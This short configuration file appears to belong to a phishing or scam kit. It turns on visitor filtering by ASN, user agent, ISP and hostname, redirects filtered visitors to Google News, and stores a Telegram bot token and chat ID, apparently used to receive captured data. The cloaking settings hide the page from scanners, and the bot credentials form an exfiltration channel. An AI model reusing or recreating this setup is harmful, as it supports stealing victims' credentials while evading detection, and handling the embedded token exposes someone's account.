setting_asn='on'
setting_ua='on'
setting_isp='on'
setting_host='on'
setting_crawlerdetect='off'
setting_country='off'

Token='1920036681:AAHifza_PgKhA-ci4I6Yl0Y270YB5J89S4s'
ChatID='1705539698'
viewsToken='1920036681:AAHifza_PgKhA-ci4I6Yl0Y270YB5J89S4s'
viewsChatID='1705539698'

Exit_asn='https://news.google.com/'
Exit_ua='https://news.google.com/'
Exit_isp='https://news.google.com/'
Exit_host='https://news.google.com/'
Exit_crawlerdetect='https://news.google.com/'
Exit_proxy='https://news.google.com/'
Exit_vpn='https://news.google.com/'
Exit_country='https://news.google.com/'